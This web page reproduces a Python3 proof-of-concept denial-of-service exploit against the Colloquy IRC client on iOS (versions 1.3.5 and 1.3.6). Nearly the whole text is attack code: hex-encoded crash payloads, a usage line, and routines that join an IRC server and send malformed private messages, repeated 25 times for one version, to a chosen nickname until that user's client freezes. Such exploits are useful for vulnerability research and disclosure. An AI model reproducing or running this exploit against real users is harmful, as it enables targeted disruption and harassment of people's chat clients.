扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 |
#!/usr/bin/python3 ################################################################################### # Wednesday, January 09, 2013 # # # #__.__.__ # __| || |_|| ____ ____ |__| ____ ____ # \ __ /| _/ __ \ / ___\||/_ \ /\ #||||||_\___// /_/>(<_> ) |\ # /_~~_\____/\___>___/|__|\____/|___|/ # |_||_| \/_____/\/ #http://www.zempirians.com # #00100011 01101100 01100101 01100111 01101001 01101111 01101110 # # # # -=[ Colloquy - A Mac OS X Internet Chat client. ] =- # #[P]roof [o]f [C]oncept, Denial of Service # # # # ################################################################################### # #T E A M# # ####################### # #UberLame .......> Provided exploit discovery + payloads #Aph3x.......> Provided main payload attack for this demostration. <3 # O_O.......> Built the concept in Python3 #Apetrick .......> Allowed testing of the exploit against his ipod #syk.......> Allowed testing of the exploit against his iphone5 # # ################################################################################### #SUMMARY # ################ # # This DOS is designed to freeze the client making it impossible to do anything # with it. The user will need to manually restart the application in order to # continue using it. # # There are over a few dozen ways to crash the Colloquy client, however, we # will only be showing 3 various methods. These glitches were suppose to be # fixed in 'Colloquy' 1.3.5, however, they still exist in the lastest release # of 1.3.6... # ################ #VULNERABLE# ################ # # Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi #Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi # ################ #PATCH # ################ # #There is no CVE reported. # ################ #PATCH # ################ # #There is no PATCH available. # ################################################################################### ## # ##H O W - T O# ## # ######################## # # Provide the Target: Server, Port, Nickname and the script will deliver # the payload... # # [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname> # ################################################################################### from argparse import ArgumentParser from time import sleep import socket shellcode = { # One Shot <3 'one_shot': [ \ "687474703a2f2f782f2e2425235e26402426402426232424242425232426", "23242623262340262a232a235e28242923404040245e2340242625232323", "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324", "2e24" ], # 1.3.5 '1_3_5': [ \ "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428", "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874", "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c" "7573657228292c2873656c6563742532302d2d687474703a2f2f" ], # 1.3.6 - ( Requires Sending 25 Times ) '1_3_6': [ \ "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428", "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874", "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c", "7573657228292c2873656c6563742532302d2d687474703a2f2f" ], } def own( sock, target, sc_key='one_shot' ): sc = ''.join( shellcode[sc_key] ) targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) ) msg = "505249564d534720{}203a{}0d0a".format( targ, sc ) if sc_key not in '1_3_6': sock.send( bytes.fromhex( msg ) ) else: try: for x in range( 1, 26 ): sock.send( bytes.fromhex( msg ) ) sleep( .64 ) except: print( 'FAILED!') def connect( uri, port, target, sc_key ): sock = socket.socket() try: ret = sock.connect_ex(( uri, int( port ) )) sock.recv(8096) except: print( "\t[-] Failed To Connect To {}".format( uri ) ) exit() sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" ) sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" ) while True: host_data = str( sock.recv( 8096 ).strip() ) if ' 396 ' in host_data: print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) ) own( sock, target, sc_key ) sock.send( b'QUIT\r\n' ) sock.close() break try: msg = host_data.split() if msg[0].lower() is 'ping': sock.send( b"PONG {}\r\n".format( msg[1] ) ) continue except: pass print( '\t[!] Payload Sent, Target Should Drop Shortly <3' ) if __name__ == '__main__': parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' ) parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" ) parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" ) parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" ) parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot', help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' ) args = parser.parse_args() if args.nick is None: parser.print_help() exit() connect( args.target, args.port, args.nick, args.shellcode.strip() ) |
体验盒子
